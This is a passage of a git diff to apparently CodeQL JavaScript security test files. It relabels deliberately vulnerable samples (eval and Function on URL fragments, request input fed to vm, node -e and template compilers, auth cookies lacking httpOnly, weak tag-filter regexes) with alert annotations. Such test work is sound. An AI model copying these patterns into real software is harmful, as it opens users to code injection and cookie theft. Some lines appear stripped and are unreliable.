$compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { - $compile('hello'); // OK + $compile('hello'); }) .controller('MyController', function($compile) { - $compile(location.search); // BAD + $compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { var compile = $compile; - compile(location.search); // BAD + compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($parse) { - $parse(location.search); // BAD + $parse(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($interpolate) { - $interpolate(location.search); // BAD + $interpolate(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($filter) { - $filter('orderBy')([], location.search); // BAD + $filter('orderBy')([], location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($filter) { - $filter('orderBy')([], 'hello'); // OK + $filter('orderBy')([], 'hello'); }) .controller('MyController', function($filter) { - $filter('random')([], location.search); // OK + $filter('random')([], location.search); }) .controller('MyController', function($someService) { - $someService('orderBy')([], location.search); // OK + $someService('orderBy')([], location.search); }) .controller('MyController', function($someService) { - $someService(location.search); // OK + $someService(location.search); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js index f330b1513546..a49288de66ee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js @@ -5,18 +5,18 @@ function safeProp(key) { function test1() { const statements = []; statements.push(`${name}${safeProp(key)}=${stringify(thing[key])}`); - return `(function(){${statements.join(';')}})` // NOT OK + return `(function(){${statements.join(';')}})` // $ Alert[js/bad-code-sanitization] } import htmlescape from 'htmlescape' function test2(props) { const pathname = props.data.pathname; - return `function(){return new Error('${htmlescape(pathname)}')}`; // NOT OK + return `function(){return new Error('${htmlescape(pathname)}')}`; // $ Alert[js/bad-code-sanitization] } function test3(input) { - return `(function(){${JSON.stringify(input)}))` // NOT OK + return `(function(){${JSON.stringify(input)}))` // $ Alert[js/bad-code-sanitization] } function evenSaferProp(key) { @@ -24,24 +24,24 @@ function evenSaferProp(key) { } function test4(input) { - return `(function(){${evenSaferProp(input)}))` // OK + return `(function(){${evenSaferProp(input)}))` } function test4(input) { - var foo = `(function(){${JSON.stringify(input)}))` // NOT OK - we can type-track to a code-injection sink, the source is not remote flow. + var foo = `(function(){${JSON.stringify(input)}))` // $ Alert[js/bad-code-sanitization] - we can type-track to a code-injection sink, the source is not remote flow. setTimeout(foo); } function test5(input) { - console.log('methodName() => ' + JSON.stringify(input)); // OK + console.log('methodName() => ' + JSON.stringify(input)); } function test6(input) { - return `(() => {${JSON.stringify(input)})` // NOT OK + return `(() => {${JSON.stringify(input)})` // $ Alert[js/bad-code-sanitization] } function test7(input) { - return `() => {${JSON.stringify(input)}` // NOT OK + return `() => {${JSON.stringify(input)}` // $ Alert[js/bad-code-sanitization] } var express = require('express'); @@ -49,7 +49,7 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - var foo = `(function(){${JSON.stringify(req.param("wobble"))}))` // NOT - the source is remote-flow, but we know of no sink. + var foo = `(function(){${JSON.stringify(req.param("wobble"))}))` // $ Alert[js/bad-code-sanitization] - the source is remote-flow, but we know of no sink. setTimeout(`(function(){${JSON.stringify(req.param("wobble"))}))`); // OK - the source is remote-flow, and the sink is code-injection. @@ -61,7 +61,7 @@ app.get('/some/path', function(req, res) { // Bad documentation example: function createObjectWrite() { const assignment = `obj[${JSON.stringify(key)}]=42`; - return `(function(){${assignment}})` // NOT OK + return `(function(){${assignment}})` // $ Alert[js/bad-code-sanitization] } // Good documentation example: @@ -87,6 +87,6 @@ function good() { function createObjectWrite() { const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`; - return `(function(){${assignment}})` // OK + return `(function(){${assignment}})` } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js index 3a5abba84c03..58e67741a8c5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js @@ -3,30 +3,23 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - // NOT OK - var f = new Function("return wibbles[" + req.param("wobble") + "];"); - // NOT OK - require("vm").runInThisContext("return wibbles[" + req.param("wobble") + "];"); + var f = new Function("return wibbles[" + req.param("wobble") + "];"); // $ Alert + require("vm").runInThisContext("return wibbles[" + req.param("wobble") + "];"); // $ Alert var runC = require("vm").runInNewContext; - // NOT OK - runC("return wibbles[" + req.param("wobble") + "];"); + runC("return wibbles[" + req.param("wobble") + "];"); // $ Alert var vm = require("vm"); - // NOT OK - vm.compileFunction(req.param("code_compileFunction")); - // NOT OK - var script = new vm.Script(req.param("code_Script")); - // NOT OK - var mdl = new vm.SourceTextModule(req.param("code_SourceTextModule")); - // NOT OK - vm.runInContext(req.param("code_runInContext"), vm.createContext()); + vm.compileFunction(req.param("code_compileFunction")); // $ Alert + var script = new vm.Script(req.param("code_Script")); // $ Alert + var mdl = new vm.SourceTextModule(req.param("code_SourceTextModule")); // $ Alert + vm.runInContext(req.param("code_runInContext"), vm.createContext()); // $ Alert }); const cp = require('child_process'); app.get('/other/path', function(req, res) { const taint = req.param("wobble"); - cp.execFileSync('node', ['-e', taint]); // NOT OK + cp.execFileSync('node', ['-e', taint]); // $ Alert[js/code-injection] - cp.execFileSync('node', ['-e', `console.log(${JSON.stringify(taint)})`]); // OK + cp.execFileSync('node', ['-e', `console.log(${JSON.stringify(taint)})`]); }); const pty = require('node-pty'); @@ -40,13 +33,13 @@ app.get('/terminal', function(req, res) { env: process.env }); - shell.write(taint); // NOT OK + shell.write(taint); // $ Alert[js/code-injection] }); require("express-ws")(app); app.ws("/socket-thing/", function (ws, req) { ws.on("message", function (msg) { - eval(msg); // NOT OK + eval(msg); // $ Alert[js/code-injection] }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js index 9df334c56dc1..dbb715dfd7a4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js @@ -1,17 +1,17 @@ export function unsafeDeserialize(data) { - return eval("(" + data + ")"); // NOT OK + return eval("(" + data + ")"); // $ Alert[js/unsafe-code-construction] } export function unsafeGetter(obj, name) { - return eval("obj." + name); // NOT OK + return eval("obj." + name); // $ Alert[js/unsafe-code-construction] } export function safeAssignment(obj, value) { - eval("obj.foo = " + JSON.stringify(value)); // OK + eval("obj.foo = " + JSON.stringify(value)); } global.unsafeDeserialize = function (data) { - return eval("(" + data + ")"); // NOT OK + return eval("(" + data + ")"); // $ Alert[js/unsafe-code-construction] } const matter = require("gray-matter"); @@ -25,7 +25,7 @@ export function greySink(data) { const res = matter(str); console.log(res); - matter(str, { // OK + matter(str, { engines: { js: function (data) { console.log("NOPE"); @@ -48,7 +48,7 @@ export function Template(text, opts) { Template.prototype = { compile: function () { var opts = this.opts; - eval(" var " + opts.varName + " = something();"); // NOT OK + eval(" var " + opts.varName + " = something();"); // $ Alert }, // The below are justs tests that ensure the global-access-path computations terminate. pathsTerminate1: function (node, prev) { @@ -100,10 +100,10 @@ export class AccessPathClass { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options2.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options3.taintedOption + " = something();"); // NOT OK - eval(" var " + this.taint + " = something();"); // NOT OK + eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert + eval(" var " + this.taint + " = something();"); // $ Alert } } @@ -132,10 +132,10 @@ export class AccessPathClassBB { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options2.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options3.taintedOption + " = something();"); // NOT OK - eval(" var " + this.taint + " = something();"); // NOT OK + eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert + eval(" var " + this.taint + " = something();"); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js index 64eeea78f2f1..18885dd25577 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js @@ -6,7 +6,7 @@ var app = express(); app.get('/some/path', function (req, res) { let filename = req.query.filename; var m = new Module(filename, module.parent); - m._compile(req.query.code, filename); // NOT OK + m._compile(req.query.code, filename); // $ Alert[js/code-injection] var m2 = new module.constructor; - m2._compile(req.query.code, filename); // NOT OK + m2._compile(req.query.code, filename); // $ Alert[js/code-injection] }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js index 0a9edc1ebe9c..9c11b511aa27 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js @@ -5,7 +5,7 @@ var app = express(); app.get('/some/path', function(req, res) { let tainted = req.param("code"); - ; // NOT OK + ; // $ Alert[js/code-injection] let wv = ; - wv.injectJavaScript(tainted); // NOT OK + wv.injectJavaScript(tainted); // $ Alert[js/code-injection] }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js index 51554663e4ee..d85b45e076f7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js @@ -17,18 +17,18 @@ var app = express(); app.get('/some/path', function (req, res) { let tainted = req.query.foo; - pug.compile(tainted); // NOT OK - pug.render(tainted); // NOT OK - jade.compile(tainted); // NOT OK - jade.render(tainted); // NOT OK - dot.template(tainted); // NOT OK - ejs.render(tainted); // NOT OK - nunjucks.renderString(tainted); // NOT OK - lodash.template(tainted); // NOT OK - dot.compile(tainted); // NOT OK - handlebars.compile(tainted); // NOT OK - mustache.render(tainted); // NOT OK - Hogan.compile(tainted); // NOT OK - Eta.render(tainted); // NOT OK - Sqrl.render(tainted); // NOT OK + pug.compile(tainted); // $ Alert[js/code-injection] + pug.render(tainted); // $ Alert[js/code-injection] + jade.compile(tainted); // $ Alert[js/code-injection] + jade.render(tainted); // $ Alert[js/code-injection] + dot.template(tainted); // $ Alert[js/code-injection] + ejs.render(tainted); // $ Alert[js/code-injection] + nunjucks.renderString(tainted); // $ Alert[js/code-injection] + lodash.template(tainted); // $ Alert[js/code-injection] + dot.compile(tainted); // $ Alert[js/code-injection] + handlebars.compile(tainted); // $ Alert[js/code-injection] + mustache.render(tainted); // $ Alert[js/code-injection] + Hogan.compile(tainted); // $ Alert[js/code-injection] + Eta.render(tainted); // $ Alert[js/code-injection] + Sqrl.render(tainted); // $ Alert[js/code-injection] }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js index 5b51da5daf26..0e35c7529112 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js @@ -1,38 +1,31 @@ -// NOT OK -eval(document.location.href.substring(document.location.href.indexOf("default=")+8)) +eval(document.location.href.substring(document.location.href.indexOf("default=")+8)) // $ Alert + +setTimeout(document.location.hash); // $ Alert -// NOT OK -setTimeout(document.location.hash); -// OK setTimeout(document.location.protocol); -// OK + $('. ' + document.location.hostname); -// NOT OK -Function(document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1")); +Function(document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1")); // $ Alert -// NOT OK -WebAssembly.compile(document.location.hash); +WebAssembly.compile(document.location.hash); // $ Alert -// NOT OK -WebAssembly.compileStreaming(document.location.hash); +WebAssembly.compileStreaming(document.location.hash); // $ Alert -// NOT OK -eval(atob(document.location.hash.substring(1))); +eval(atob(document.location.hash.substring(1))); // $ Alert -// NOT OK -$('').attr("onclick", location.search.substring(1)); +$('').attr("onclick", location.search.substring(1)); // $ Alert (function test() { var source = document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1"); - new Function(source); // NOT OK + new Function(source); // $ Alert[js/code-injection] - Function(source); // NOT OK + Function(source); // $ Alert[js/code-injection] - new Function("a", "b", source); // NOT OK + new Function("a", "b", source); // $ Alert[js/code-injection] - new Function(...["a", "b"], source); // NOT OK + new Function(...["a", "b"], source); // $ Alert[js/code-injection] })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html index 3f62fd326211..1d2014837d27 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html @@ -1,6 +1,6 @@ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js index 00fb98af9675..e9cb0a8b755c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js @@ -1,5 +1,5 @@ import * as webix from 'webix'; -webix.exec(document.location.hash); // NOT OK -webix.ui({ template: document.location.hash }); // NOT OK -webix.ui({ template: function () { return document.location.hash } }); // NOT OK \ No newline at end of file +webix.exec(document.location.hash); // $ Alert[js/code-injection] +webix.ui({ template: document.location.hash }); // $ Alert[js/code-injection] +webix.ui({ template: function () { return document.location.hash } }); // $ Alert[js/code-injection] \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js index 8ffd5a8addda..7c97f134bc90 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js @@ -10,5 +10,5 @@ window.addEventListener("message", (ev) => { let message = JSON.parse(ev.data); // Let the parent frame call the 'play' or 'pause' function - window[message.name](message.payload); // NOT OK + window[message.name](message.payload); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js index 2119fa97ed23..a5c32b914c70 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js @@ -2,21 +2,21 @@ let obj = {}; window.addEventListener('message', (ev) => { let message = JSON.parse(ev.data); - window[message.name](message.payload); // NOT OK - may invoke eval - new window[message.name](message.payload); // NOT OK - may invoke jQuery $ function or similar + window[message.name](message.payload); // $ Alert - may invoke eval + new window[message.name](message.payload); // $ Alert - may invoke jQuery $ function or similar window["HTMLElement" + message.name](message.payload); // OK - concatenation restricts choice of methods window[`HTMLElement${message.name}`](message.payload); // OK - concatenation restricts choice of methods function f() {} - f[message.name](message.payload)(); // NOT OK - may acccess Function constructor + f[message.name](message.payload)(); // $ Alert - may acccess Function constructor obj[message.name](message.payload); // OK - may crash, but no code execution involved - window[ev](ev); // NOT OK + window[ev](ev); // $ Alert window[configData() + ' ' + message.name](message.payload); // OK - concatenation restricts choice of methods window[configData() + message.name](message.payload); // OK - concatenation restricts choice of methods - window['' + message.name](message.payload); // NOT OK - coercion does not restrict choice of methods + window['' + message.name](message.payload); // $ Alert - coercion does not restrict choice of methods }); diff --git a/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js b/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js index b91f82c781f2..492990b49082 100644 --- a/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js +++ b/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js @@ -5,19 +5,19 @@ const session = require('cookie-session') app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: true, // GOOD + httpOnly: true, })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: false // BAD + httpOnly: false // $ Alert })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - secure: true // GOOD, httpOnly is true by default + secure: true // OK - httpOnly is true by default })) var sess = { @@ -26,7 +26,7 @@ var sess = { } sess.httpOnly = false; -app.use(session(sess)) // BAD +app.use(session(sess)) // $ Alert var sess2 = { name: 'session', @@ -35,7 +35,7 @@ var sess2 = { } sess2.httpOnly = false; -app.use(session(sess2)) // BAD +app.use(session(sess2)) // $ Alert var sess3 = { name: 'mycookie', @@ -44,21 +44,21 @@ var sess3 = { } sess3.httpOnly = false; -app.use(session(sess3)) // BAD, It is a session cookie, name doesn't matter +app.use(session(sess3)) // $ Alert - It is a session cookie, name doesn't matter var flag = false var flag2 = flag app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: flag2 // BAD + httpOnly: flag2 // $ Alert })) app.get('/a', function (req, res, next) { res.cookie('authkey', 'value', { maxAge: 9000000000, - httpOnly: true, // GOOD + httpOnly: true, secure: false }); res.end('ok') @@ -68,7 +68,7 @@ app.get('/a', function (req, res, next) { res.cookie('authkey', 'value', { maxAge: 9000000000, - httpOnly: false, // BAD + httpOnly: false, // $ Alert secure: false }); res.end('ok') @@ -79,13 +79,13 @@ app.get('/a', function (req, res, next) { { maxAge: 9000000000 }); - res.end('ok') // BAD + res.end('ok') // $ Alert }) app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000, - httpOnly: true, // GOOD + httpOnly: true, secure: false } res.cookie('authkey', 'value', options); @@ -95,7 +95,7 @@ app.get('/a', function (req, res, next) { app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000, - httpOnly: false, // BAD + httpOnly: false, // $ Alert secure: false } res.cookie('authkey', 'value', options); @@ -106,7 +106,7 @@ app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000 } - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -115,7 +115,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000 } options.httpOnly = false; - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -124,7 +124,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000 } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -134,7 +134,7 @@ app.get('/a', function (req, res, next) { httpOnly: false, } options.httpOnly = false; - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -145,7 +145,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let authKey = "blabla" - res.cookie(authKey, 'value', options); // BAD, var name likely auth related + res.cookie(authKey, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -156,7 +156,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let o = { authKey: "blabla" } - res.cookie(o.authKey, 'value', options); // BAD, var name likely auth related + res.cookie(o.authKey, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -167,7 +167,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let blabla = "authKey" - res.cookie(blabla, 'value', options); // BAD, var name likely auth related + res.cookie(blabla, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -177,7 +177,7 @@ app.get('/a', function (req, res, next) { httpOnly: true, } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -187,7 +187,7 @@ app.get('/a', function (req, res, next) { httpOnly: false, } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -196,7 +196,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000, httpOnly: false, } - res.cookie('mycookie', 'value', options); // GOOD, name likely is not auth sensitive + res.cookie('mycookie', 'value', options); // OK - name likely is not auth sensitive res.end('ok') }) @@ -205,8 +205,7 @@ const http = require('http'); function test1() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // BAD - res.setHeader("Set-Cookie", "authKey=ninja"); + res.setHeader("Set-Cookie", "authKey=ninja"); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -215,7 +214,7 @@ function test1() { function test2() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD + res.setHeader("Set-Cookie", "auth=ninja; HttpOnly"); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -225,8 +224,7 @@ function test2() { function test3() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // BAD - res.setHeader("Set-Cookie", ["authKey=ninja", "token=javascript"]); + res.setHeader("Set-Cookie", ["authKey=ninja", "token=javascript"]); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -235,7 +233,7 @@ function test3() { function test4() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD + res.setHeader("Set-Cookie", ["auth=ninja; HttpOnly"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -245,7 +243,7 @@ function test4() { function test5() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD, case insensitive + // OK - case insensitive res.setHeader("Set-Cookie", ["auth=ninja; httponly"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -265,7 +263,7 @@ function test6() { function test7() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // Good, not auth related + // OK - not auth related res.setHeader("Set-Cookie", ["foo=ninja", "bar=javascript"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -276,7 +274,7 @@ function test8() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); let attr = "; httponly" - res.setHeader("Set-Cookie", `session=ninja ${attr}`); // Good, httponly string expression + res.setHeader("Set-Cookie", `session=ninja ${attr}`); // OK - httponly string expression res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -286,7 +284,7 @@ function test9() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); let attr = "; secure" - res.setHeader("Set-Cookie", `authKey=ninja ${attr}`); // Bad, not httponly string expression + res.setHeader("Set-Cookie", `authKey=ninja ${attr}`); // $ Alert - not httponly string expression res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -297,22 +295,22 @@ const session = require('express-session') app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { httpOnly: true }, // GOOD + cookie: { httpOnly: true }, })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { httpOnly: false } // BAD + cookie: { httpOnly: false } // $ Alert })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { secure: true } // GOOD, httpOnly is true by default + cookie: { secure: true } // OK - httpOnly is true by default })) -app.use(session({ // GOOD, httpOnly is true by default +app.use(session({ // OK - httpOnly is true by default name: 'session', keys: ['key1', 'key2'] })) @@ -320,14 +318,14 @@ app.use(session({ // GOOD, httpOnly is true by default app.use(session({ name: 'mycookie', keys: ['key1', 'key2'], - cookie: { httpOnly: false } // BAD, It is a session cookie, name doesn't matter + cookie: { httpOnly: false } // $ Alert - It is a session cookie, name doesn't matter })) const http = require('http'); function test10() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - res.setHeader("Set-Cookie", "sessionKey=" + makeSessionKey()); // BAD + res.setHeader("Set-Cookie", "sessionKey=" + makeSessionKey()); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js index 5b294adae1b7..5fdc3b0c798e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js @@ -1,25 +1,25 @@ var filters = [ - /.*?<\/script>/i, // NOT OK - doesn't match newlines or `` - /.*?<\/script>/is, // NOT OK - doesn't match `` - /.*?<\/script[^>]*>/is, // OK + /.*?<\/script>/i, // $ Alert - doesn't match newlines or `` + /.*?<\/script>/is, // $ Alert - doesn't match `` + /.*?<\/script[^>]*>/is, //is, // OK - we don't care regexps that only match comments - /)|([^\/\s>]+)[\S\s]*?>/, // NOT OK - doesn't match comments with the right capture groups - /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, // NOT OK - capture groups - /(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)/gi, // NOT OK - capture groups - /<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))/g, // NOT OK - capture groups - /|<([^>]*?)>/g, // NOT OK - capture groups + /)|([^\/\s>]+)[\S\s]*?>/, // $ Alert - doesn't match comments with the right capture groups + /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, // $ Alert - capture groups + /(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)/gi, // $ Alert - capture groups + /<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))/g, // $ Alert - capture groups + /|<([^>]*?)>/g, // $ Alert - capture groups ] doFilters(filters) @@ -28,8 +28,8 @@ var strip = ']*)>([\\S\\s]*?)<\/script([^>]*)>'; // OK - it's used w new RegExp(strip, 'gi'); var moreFilters = [ - /-->/g, // NOT OK - doesn't match --!> - /^>|^->||--!>|/g, // $ Alert - doesn't match --!> + /^>|^->||--!>|\x20\t\r\n\f]*)[^>]*)\/>/gi, expanded - ); // NOT OK - html.replace(/<(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi, expanded); // NOT OK + ); // $ Alert + html.replace(/<(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi, expanded); // $ Alert // lib2 html.replace( /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi, expanded - ); // NOT OK - html.replace(/<(([\w:]+)[^>]*)\/>/gi, expanded); // NOT OK + ); // $ Alert + html.replace(/<(([\w:]+)[^>]*)\/>/gi, expanded); // $ Alert // lib3 html.replace( /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:-]+)[^>]*)\/>/gi, expanded - ); // NOT OK - html.replace(/<(([\w:-]+)[^>]*)\/>/gi, expanded); // NOT OK + ); // $ Alert + html.replace(/<(([\w:-]+)[^>]*)\/>/gi, expanded); // $ Alert - html.replace(defaultPattern, expanded); // NOT OK + html.replace(defaultPattern, expanded); // $ Alert function getPattern() { return defaultPattern; } - html.replace(getPattern(), expanded); // NOT OK + html.replace(getPattern(), expanded); // $ Alert function getExpanded() { return expanded; } - html.replace(defaultPattern, getExpanded()); // NOT OK (but not tracking the expansion string) - html.replace(defaultPattern, something); // OK (possibly) - defaultPattern.match(something); // OK (possibly) - getPattern().match(something); // OK (possibly) + html.replace(defaultPattern, getExpanded()); // MISSING: Alert - not tracking the expansion string + html.replace(defaultPattern, something); // OK - possibly + defaultPattern.match(something); // OK - possibly + getPattern().match(something); // OK - possibly }); diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js index 2c31e247bf22..680535452194 100644 --- 